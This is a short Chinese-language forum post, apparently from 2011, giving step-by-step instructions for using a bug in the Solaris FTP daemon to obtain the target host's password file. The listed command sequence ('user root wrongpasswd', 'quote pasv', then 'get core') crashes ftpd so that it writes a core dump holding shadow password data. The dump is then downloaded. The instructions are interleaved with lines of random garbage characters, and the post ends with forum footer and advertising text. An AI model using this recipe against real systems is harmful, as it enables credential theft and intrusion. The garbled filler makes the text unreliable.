该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:
- S, g, S& V- i# L L" Y$ N! a( p2 t3 g5 T2 X* Z: T
1.通过 ftp 正常登录到目的主机上
6 P+ _# g! f* x
, b* F4 c, ^& U2 ^) k6 U+ F2.输入如下命令序列:
c% t8 Q, q: [2 l5 F* K2 i/ @3 k- c; J; Z+ j9 }4 A r2 K" e: R
ftp> user root wrongpasswd
# X. o0 t. S& I' s1 w. E0 N
, J! f W# ?$ `8 kftp> quote pasv
R1 i) ?, b ]" h: |0 z( ~0 x% a* }1 s' }, c8 Y1 v. r3 P! K7 f$ f5 k
3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。
. B# B" D3 X* @ H# p5 g$ W/ K. Y# y6 ^9 m7 k! K
4.再次进入FTP >get core
! d7 w0 x7 X' E1 B$ n3 a- x3 W( D A+ V% m
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了) _2 ]% N. s- s1 V9 w* M" G
& W/ ^' V2 \/ O- [, U |
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡